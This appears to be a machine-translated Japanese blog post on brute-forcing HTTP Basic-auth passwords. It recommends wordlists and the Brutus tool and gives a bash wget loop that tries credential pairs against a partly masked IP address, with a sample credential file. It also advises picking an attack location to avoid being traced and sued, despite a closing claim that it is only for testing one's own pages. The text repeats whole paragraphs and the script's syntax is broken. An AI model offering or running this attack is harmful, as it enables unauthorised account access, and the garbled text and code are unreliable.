暴力解読HTTP検証ページパスワード強度
まず、ちゃんとした辞書を持っていなければなりませんね.海外サイトでWordlistをアップしたり、自分で簡単なプログラムを書いて辞書を生成したりします.もしプログラムが書けないなら、ほほほ、辞書生成プログラムをダウンロードしましょう.(ただし、ネット上のwordlistや、ネット上の辞書生成プログラムで生成された辞書は、使いにくいようです)
次に、辞書を使って仕事をする道具が必要でしょう.有名なbrutusのようなツールをネットからダウンロードすることができます.実行時のインタフェースは次のとおりです.
もちろん、自分でツールを書くこともできます.筆者は簡単なシナリオを書いて仕事をしました.
再び、暴力の解読はSYN攻撃ではなく、IP詐欺は不可能であり、あなたの古い巣はどこにあるのか、被害者は一目で見ることができることを知っておくべきだ.だから、ちゃんと「狙撃地」を選びましょう.うまくいかないと訴訟になるよ.
最后に、本人はHTTPを行って暴力の解読を検证して、ただ自分の保护するWEBページのパスワードの强度を検证して、决して他の人のウェブサイトに面倒をかけることはできません.記憶にとどめる.
次に、辞書を使って仕事をする道具が必要でしょう.有名なbrutusのようなツールをネットからダウンロードすることができます.実行時のインタフェースは次のとおりです.
もちろん、自分でツールを書くこともできます.筆者は簡単なシナリオを書いて仕事をしました.
#!/bin/bash
#
user_password_file=/root/wget_cracker_user_password
while read user_password ; do
user=$(user_password#:}
password=$(user_password%:}
wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp
if [ $? -eq 0 ] ; then
echo "OK I got an password: user: $user ; password: $password !"
exit 0
fi
done < $user_password_file
exit 0
-bash-3.00# cat wget_cracker_user_password
abc:adeeffaf
deff:afkafsasf
guest:affaewf
guest:guest
guest:afdasf再び、暴力の解読はSYN攻撃ではなく、IP詐欺は不可能であり、あなたの古い巣はどこにあるのか、被害者は一目で見ることができることを知っておくべきだ.だから、ちゃんと「狙撃地」を選びましょう.うまくいかないと訴訟になるよ.
最后に、本人はHTTPを行って暴力の解読を検证して、ただ自分の保护するWEBページのパスワードの强度を検证して、决して他の人のウェブサイトに面倒をかけることはできません.記憶にとどめる.